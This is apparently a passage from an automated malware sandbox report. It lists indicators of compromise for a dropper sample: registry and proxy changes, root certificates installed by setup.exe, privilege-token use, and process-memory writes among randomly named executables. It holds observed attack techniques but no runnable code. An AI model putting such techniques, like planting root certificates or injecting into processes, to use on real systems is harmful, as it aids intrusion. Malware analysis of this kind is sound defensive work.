Pwhrnod.exehVUcgSG.exerundll32.exepowershell.exewscript.exealRnUJb.exepowershell.exesvchost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Pwhrnod.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\WpadDecision = "0" Pwhrnod.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 Pwhrnod.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 
01000000000000006076617a66bfda01 alRnUJb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" alRnUJb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 hVUcgSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" Pwhrnod.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\WpadNetworkName = "Network 3" Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 
4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\8e-f4-c8-ba-12-f0 hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" alRnUJb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings hVUcgSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet 
Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\8e-f4-c8-ba-12-f0 Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\MY svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet 
Settings\Wpad\8e-f4-c8-ba-12-f0 hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0\WpadDecisionReason = "1" hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe -
Modifies registry class 2 IoCs
Processes:
rundll32.exe rundll32.exe description ioc process
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings rundll32.exe
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings rundll32.exe
-
Processes:
setup.exeaj2A10.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76
bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 setup.exe Set value (data) 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d23041830168014
03de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde aj2A10.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 aj2A10.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 setup.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exe pid process
3020 vlc.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exepid process 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
vlc.exe taskmgr.exe pid process
3020 vlc.exe
1736 taskmgr.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exe7zG.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exeQsEZf7p3mqmJQ7IoFER23P5U.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exeWMIC.exepowershell.EXEpowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1736 taskmgr.exe Token: SeRestorePrivilege 1624 7zG.exe Token: 35 1624 7zG.exe Token: SeSecurityPrivilege 1624 7zG.exe Token: SeSecurityPrivilege 1624 7zG.exe Token: SeShutdownPrivilege 1616 powercfg.exe Token: SeShutdownPrivilege 2936 powercfg.exe Token: SeShutdownPrivilege 924 powercfg.exe Token: SeShutdownPrivilege 1124 powercfg.exe Token: SeShutdownPrivilege 2356 powercfg.exe Token: SeShutdownPrivilege 668 powercfg.exe Token: SeShutdownPrivilege 2444 powercfg.exe Token: SeShutdownPrivilege 432 powercfg.exe Token: SeLockMemoryPrivilege 3020 svchost.exe Token: SeDebugPrivilege 2976 QsEZf7p3mqmJQ7IoFER23P5U.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeIncreaseQuotaPrivilege 2628 WMIC.exe Token: SeSecurityPrivilege 2628 WMIC.exe Token: SeTakeOwnershipPrivilege 2628 WMIC.exe Token: SeLoadDriverPrivilege 2628 WMIC.exe Token: SeSystemProfilePrivilege 2628 WMIC.exe Token: SeSystemtimePrivilege 2628 WMIC.exe Token: SeProfSingleProcessPrivilege 2628 WMIC.exe Token: SeIncBasePriorityPrivilege 2628 WMIC.exe Token: SeCreatePagefilePrivilege 2628 WMIC.exe Token: SeBackupPrivilege 2628 WMIC.exe Token: SeRestorePrivilege 2628 WMIC.exe Token: SeShutdownPrivilege 2628 WMIC.exe Token: SeDebugPrivilege 2628 WMIC.exe Token: SeSystemEnvironmentPrivilege 2628 WMIC.exe Token: SeRemoteShutdownPrivilege 2628 WMIC.exe Token: SeUndockPrivilege 2628 WMIC.exe Token: SeManageVolumePrivilege 2628 WMIC.exe Token: 33 2628 WMIC.exe Token: 34 2628 WMIC.exe Token: 35 2628 WMIC.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1944 WMIC.exe Token: 
SeIncreaseQuotaPrivilege 1944 WMIC.exe Token: SeSecurityPrivilege 1944 WMIC.exe Token: SeTakeOwnershipPrivilege 1944 WMIC.exe Token: SeLoadDriverPrivilege 1944 WMIC.exe Token: SeSystemtimePrivilege 1944 WMIC.exe Token: SeBackupPrivilege 1944 WMIC.exe Token: SeRestorePrivilege 1944 WMIC.exe Token: SeShutdownPrivilege 1944 WMIC.exe Token: SeSystemEnvironmentPrivilege 1944 WMIC.exe Token: SeUndockPrivilege 1944 WMIC.exe Token: SeManageVolumePrivilege 1944 WMIC.exe Token: SeDebugPrivilege 2548 powershell.EXE Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 2112 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2456 WMIC.exe Token: SeIncreaseQuotaPrivilege 2456 WMIC.exe Token: SeSecurityPrivilege 2456 WMIC.exe Token: SeTakeOwnershipPrivilege 2456 WMIC.exe Token: SeLoadDriverPrivilege 2456 WMIC.exe Token: SeSystemtimePrivilege 2456 WMIC.exe Token: SeBackupPrivilege 2456 WMIC.exe Token: SeRestorePrivilege 2456 WMIC.exe Token: SeShutdownPrivilege 2456 WMIC.exe Token: SeSystemEnvironmentPrivilege 2456 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
vlc.exetaskmgr.exe7zG.exepid process 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1624 7zG.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
vlc.exetaskmgr.exepid process 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
vlc.exe jNFCat12JprTAJuHReQN2XR8.exe fw6AeST27Bm2vlk0DxSBSQX2.exe pid process
3020 vlc.exe
2272 jNFCat12JprTAJuHReQN2XR8.exe
676 fw6AeST27Bm2vlk0DxSBSQX2.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exerundll32.exerundll32.exesetup.exeDH8573Md6ciWRCrzNsLgNn0N.exeHZCRf2RVpwaPOKWoRBM82pMK.exejNFCat12JprTAJuHReQN2XR8.exedescription pid process target process PID 2444 wrote to memory of 2620 2444 cmd.exe rundll32.exe PID 2444 wrote to memory of 2620 2444 cmd.exe rundll32.exe PID 2444 wrote to memory of 2620 2444 cmd.exe rundll32.exe PID 2620 wrote to memory of 2604 2620 rundll32.exe rundll32.exe PID 2620 wrote to memory of 2604 2620 rundll32.exe rundll32.exe PID 2620 wrote to memory of 2604 2620 rundll32.exe rundll32.exe PID 2604 wrote to memory of 3020 2604 rundll32.exe vlc.exe PID 2604 wrote to memory of 3020 2604 rundll32.exe vlc.exe PID 2604 wrote to memory of 3020 2604 rundll32.exe vlc.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2976 2808 setup.exe 